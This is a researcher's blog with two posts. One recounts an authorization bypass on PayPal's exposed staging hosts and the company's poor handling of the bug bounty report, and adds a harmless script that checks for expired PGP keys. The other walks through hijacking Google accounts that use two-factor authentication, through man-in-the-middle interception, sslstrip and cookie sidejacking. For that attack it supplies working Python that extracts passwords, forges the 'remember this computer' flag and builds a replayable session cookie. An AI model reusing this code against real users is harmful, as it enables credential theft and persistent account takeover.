PayPal Bug Bounty - a lesson in not being a fuckup.
PayPal started their bug bounty program on June 21st 2012. When I saw that, I decided that the race was on. A new marketplace had opened, and I was going to get in on it. I had my first opportunity to take some shots at finding a flaw on June 29th. At first, I assumed that a company like PayPal was going to be a well-audited, airtight group. I was wrong. Really wrong.
This recounting will cover the bugs I found and PayPal's response, including timelines. I hope this serves as a 'what not to do' guide for others creating bug bounty programs, and gives those participating in such programs an idea of what to expect when one is not run well.
I started my hunt the way I start all of my audits: on shodanhq.com. My first search query was "admin paypal", not expecting any results of value. As you can see, there are still many active hits for that search term to this date.
Once I saw 'stageXmbXXX' in the URL, I realized that for whatever reason, PayPal's staging netblock was publicly accessible. In short: this is going to be a shitshow.
After a few minutes of poking around, I picked one of the hosts and started looking for bugs. The first one: authorization bypass.
As you can see, trying 'lsmith' yielded 'Lori Smith'. This was a good sign, so I moved on to look for something a bit more substantial.
At first I saw the error and was a bit let down, then I noticed that it had actually logged me in as user 'jsmith', who was 'Janine Smith'. Progress. But this user didn't have the permissions to access the admin panel either. At this point, I wasn't even sure what this admin panel was for, and I wanted to play it safe so as not to violate the terms of the bug bounty program, which clearly stated that accessing live users' data was a violation.
After some tweaking of the syntax, I got this message. This was extremely encouraging: I got an internal IP address telling me where in this mystical place I was connecting. But I still wasn't sure what this even was, so I grabbed the page title and plugged it into Google hoping for a lead.
The first result didn't answer any questions, but was a big WTF moment. So I went on to the next results: legal exhibits from various lawsuits. And there I found this, an actual printout taken directly from this 'admin' panel.
At this point, I'm giddy. This is obviously going to be big. (Screw your XSS 'bug', I found the engine running the mother fucking jackpot.) I also realize I'm on the verge of crossing the line when it comes to the terms of the bug bounty program, so I start writing up my report and look forward to seeing what comes of it.
Report finished, I went to download PayPal's PGP key to encrypt it. But there was a problem: the key linked from their official page was expired. So I had to email them to get a working PGP key. Who announces a program like this without the foresight to not link to a fucking expired PGP key for sending in reports?
I finally got a reply with a valid PGP key. I sent off my report and awaited a speedy reply, given how serious I thought this was.
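The check that would have caught the expired key before it was ever linked, as an added example (mine, not PayPal's tooling and not part of the original post): it reads the machine-readable listing that `gpg --with-colons --show-keys key.asc` prints and reports any key that is expired, revoked, about to expire, or has no encryption-capable (sub)key. The two listings below are constructed, with fake key IDs and a made-up address, and the reference dates are chosen to match the post's timeline.

```python
"""Check that a published PGP key can actually be used for encrypted reports."""
from __future__ import annotations

import datetime as dt
from dataclasses import dataclass

UTC = dt.timezone.utc

# Reference times for the checks: the week of the post, and a date 16 days
# before SAMPLE_VALID expires (exercises the "expiring soon" warning).
NOW_2012 = dt.datetime(2012, 7, 1, tzinfo=UTC)
NOW_2014_06 = dt.datetime(2014, 6, 15, tzinfo=UTC)

# Constructed `gpg --with-colons --show-keys key.asc` output for a
# hypothetical key (fake key IDs, made-up address). Field 2 is gpg's
# validity flag ('e' = expired, 'r' = revoked), field 6 the creation time
# and field 7 the expiry, both as seconds since the epoch; field 12 lists
# the key's capabilities (lowercase 'e' = this key itself can encrypt).
SAMPLE_EXPIRED = """\
pub:e:2048:1:0123456789ABCDEF:1309478400:1340928000::-:::scESC::::::23::0:
uid:e::::1309478400::0000000000000000000000000000000000000000::Example Security <security@example.com>::::::::::0:
sub:e:2048:1:FEDCBA9876543210:1309478400:1340928000:::::e::::::23:
"""

# Same key, but with an expiry of 2014-07-01 still ahead of it.
SAMPLE_VALID = """\
pub:-:2048:1:0123456789ABCDEF:1309478400:1404172800::-:::scESC::::::23::0:
uid:-::::1309478400::0000000000000000000000000000000000000000::Example Security <security@example.com>::::::::::0:
sub:-:2048:1:FEDCBA9876543210:1309478400:1404172800:::::e::::::23:
"""


@dataclass
class KeyRecord:
    kind: str                    # "pub" (primary key) or "sub" (subkey)
    validity: str                # field 2
    key_id: str                  # field 5
    expires: dt.datetime | None  # field 7; None means the key never expires
    capabilities: str            # field 12


def parse_colons(listing: str) -> list[KeyRecord]:
    """Pull the pub/sub records out of a `gpg --with-colons` listing."""
    records = []
    for line in listing.splitlines():
        f = line.split(":")
        if len(f) < 12 or f[0] not in ("pub", "sub"):
            continue
        expires = dt.datetime.fromtimestamp(int(f[6]), tz=UTC) if f[6] else None
        records.append(KeyRecord(f[0], f[1], f[4], expires, f[11]))
    return records


def _expiry(rec: KeyRecord) -> str:
    return rec.expires.strftime("%Y-%m-%d") if rec.expires else "unknown"


def key_problems(listing: str, now: dt.datetime, warn_days: int = 30) -> list[str]:
    """Return the reasons this key should not be published for reports.

    An empty list means the key is usable: the primary key and at least one
    encryption-capable key are neither revoked, expired, nor about to expire.
    """
    records = parse_colons(listing)
    if not records or records[0].kind != "pub":
        return ["listing contains no primary key"]
    primary = records[0]
    # gpg will not encrypt to a subkey whose primary is expired or revoked,
    # so the primary is always checked, along with every encrypting key.
    enc_keys = [r for r in records if "e" in r.capabilities]
    problems = []
    if not enc_keys:
        problems.append(f"pub {primary.key_id}: no encryption-capable key")
    for rec in [primary] + [r for r in enc_keys if r is not primary]:
        label = f"{rec.kind} {rec.key_id}"
        if rec.validity == "r":
            problems.append(f"{label}: revoked")
        elif rec.validity == "e" or (rec.expires and rec.expires <= now):
            problems.append(f"{label}: expired on {_expiry(rec)}")
        elif rec.expires and rec.expires <= now + dt.timedelta(days=warn_days):
            problems.append(f"{label}: expires within {warn_days} days, on {_expiry(rec)}")
    return problems


if __name__ == "__main__":
    for name, listing in (("expired", SAMPLE_EXPIRED), ("valid", SAMPLE_VALID)):
        print(name, key_problems(listing, NOW_2012) or ["ok"])
```

Run it against the real key with `gpg --with-colons --show-keys security.asc | python check_key.py`-style plumbing, or from a cron job with a 30-day warning window, and the "expired key on the contact page" situation never reaches a researcher.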
I finally got an automated notification that my report was received.
I get another automated update saying that my report had been closed as it was ‘invalid’. I’m pissed off. So I fire back an email asking if this meant it was okay to publicly report what I had found.
I get a response back asking me not to do that, as the case had been closed because the researcher was not able to recreate it; it was going to be reclassified into a different category. (Full disclosure: at this point I had emailed in many other things I had found in that QA netblock; I might get around to covering them in another post.)
A hand-written response to another bug report reassured me that this bug was still active and that I would be paid after it was fixed, and asked me not to publicly disclose anything until that time.
I receive a payment notice for an 'XSS vulnerability'. I email them back asking if this is correct. I never received a response.
In closing: you've got to actually communicate with your researchers. There is nothing more frustrating than trying to tell someone about their problem and being stonewalled.
I’ll never waste my time with PayPal again. And you shouldn’t either.
Exploiting Google Two-Factor Authentication
Google's two-factor authentication is held up as the ultimate stopgap for keeping hackers out of email, apps, calendars, and more. So how do we beat it?
I was poking around one day while managing my corporate two-factor settings in Google Apps and realized that application-specific passwords, while convenient, undermine the security of two-factor in Google Apps.
Here's what I found. It is not so much an exploit as a flaw born of convenience.
Alice is on a coffee shop wifi network and wants to log in to check her email. Alice uses two-factor authentication, and a default browser.
Bob is a hacker. Bob wants into Alice's email. But Bob knows he can't get in because she uses two-factor authentication. Bob gets clever.
Bob man-in-the-middles the wifi network, watching for Alice to log in. Bob runs sslstrip to capture Alice's plaintext Google password (this works because Alice's first request leaves her browser over plain HTTP, so Bob can rewrite the HTTPS links before she ever sees them). Bob watches Alice enter her two-factor token, leaving the box marked 'leave me logged in for 30 days on this computer' checked. Even if Alice unchecks that box, Bob can manipulate the POST request data to make sure it's checked.
Now Bob sidejacks Alice's cookies and goes to accounts.google.com. Once he loads the page with Alice's cookies, he is prompted to enter her password. Easy, since Bob now has the plaintext password. Note: Bob is not prompted to enter a two-factor token.
Bob navigates to Security > Two-Factor (edit) > Manage Application Specific Passwords > Generate New Application Specific Password.
Bob gets a nice little password to jot down that gives him access to Alice's account whenever he likes, without having to worry about the two-factor token. Alice is never notified that Bob generated a new application-specific password.
Full disclosure: I talked with Google's security team about this, but it was deemed not a problem, since the level of exploitation that would have to take place would be outside their control.
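What Bob's proxy actually does with Alice's traffic in the steps above, as an added example (mine, not the post's and not Google's code) run on constructed messages: once sslstrip has downgraded her session to plain HTTP, it lifts the password out of the login POST, sets the 'leave me logged in' flag on the two-factor POST even though Alice left it unchecked, and folds the Set-Cookie headers from the reply into a Cookie header that can be replayed against accounts.google.com. The form field names (Email, Passwd, PersistentCookie, smsUserPin), the paths and the cookie names are hypothetical stand-ins for whatever the real forms carried.

```python
"""What Bob's proxy does with Alice's downgraded login, on constructed traffic."""
from urllib.parse import parse_qsl, urlencode

# Hypothetical form field names; the real login and verification forms
# would have to be read off the wire.
USER_FIELD, PASS_FIELD = "Email", "Passwd"
REMEMBER_FIELD, REMEMBER_VALUE = "PersistentCookie", "yes"


def http_post(path: str, body: bytes) -> bytes:
    """Build a minimal plain-HTTP POST the way Alice's browser would send it."""
    return (f"POST {path} HTTP/1.1\r\nHost: accounts.google.com\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode() + body


# Constructed: Alice's two POSTs after sslstrip has stripped the TLS. The
# second is the two-factor step, with the "30 days" box left unchecked
# (hypothetical paths and field names).
ALICE_LOGIN = http_post("/ServiceLoginAuth",
                        b"Email=alice%40example.com&Passwd=hunter2&signIn=Sign+in")
ALICE_VERIFY = http_post("/SmsAuth", b"smsUserPin=123456&smsVerify=Verify")

# Constructed: the server's reply to the verification POST. Bob holds the
# TLS session to the real server himself, so he sees this in the clear
# regardless of the Secure flag.
GOOGLE_VERIFY_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: https://mail.google.com/mail/\r\n"
    b"Set-Cookie: SID=abc123; Domain=.google.com; Path=/; Secure; HttpOnly\r\n"
    b"Set-Cookie: SMSV=trusted-device; Expires=Fri, 31-Aug-2012 00:00:00 GMT; Path=/\r\n"
    b"Content-Length: 0\r\n\r\n"
)


def parse_request(raw: bytes) -> tuple[str, dict[str, str], bytes]:
    """Split a request into request line, lowercased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def serialize_request(request_line: str, headers: dict[str, str], body: bytes) -> bytes:
    """Re-emit a request with Content-Length fixed up for the (possibly new) body.
    Header names are case-insensitive, so the lowercased names are fine."""
    headers = dict(headers, **{"content-length": str(len(body))})
    head = "\r\n".join([request_line, *(f"{k}: {v}" for k, v in headers.items())])
    return head.encode("latin-1") + b"\r\n\r\n" + body


def form_fields(raw_request: bytes) -> dict[str, str]:
    """Decode the urlencoded body of a request into a dict."""
    return dict(parse_qsl(parse_request(raw_request)[2].decode(), keep_blank_values=True))


def harvest_credentials(raw_login: bytes) -> dict[str, str]:
    """Step 1: the password is plaintext once sslstrip has done its job."""
    form = form_fields(raw_login)
    return {"user": form.get(USER_FIELD, ""), "password": form.get(PASS_FIELD, "")}


def force_trusted_device(raw_verify: bytes) -> bytes:
    """Step 2: set the 'remember this computer' flag whatever Alice chose."""
    request_line, headers, _ = parse_request(raw_verify)
    form = form_fields(raw_verify)
    form[REMEMBER_FIELD] = REMEMBER_VALUE
    return serialize_request(request_line, headers, urlencode(form).encode())


def harvest_cookies(raw_response: bytes) -> str:
    """Step 3: fold every Set-Cookie into one Cookie header Bob can replay."""
    head, _, _ = raw_response.partition(b"\r\n\r\n")
    jar = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "set-cookie":
            cookie_name, _, cookie_value = value.strip().split(";", 1)[0].partition("=")
            jar[cookie_name.strip()] = cookie_value.strip()
    return "; ".join(f"{k}={v}" for k, v in jar.items())


def sidejacked_request(path: str, cookie_header: str) -> bytes:
    """Step 4: Bob's own visit to accounts.google.com carrying Alice's session."""
    return serialize_request(f"GET {path} HTTP/1.1",
                             {"host": "accounts.google.com", "cookie": cookie_header}, b"")


if __name__ == "__main__":
    print(harvest_credentials(ALICE_LOGIN))
    print(force_trusted_device(ALICE_VERIFY).decode())
    print(sidejacked_request("/", harvest_cookies(GOOGLE_VERIFY_RESPONSE)).decode())
```

Everything after the sslstrip downgrade is ordinary proxying, which is why the proxy sees the password and the cookies in the clear and can rewrite the verification POST without Alice noticing anything beyond a missing padlock.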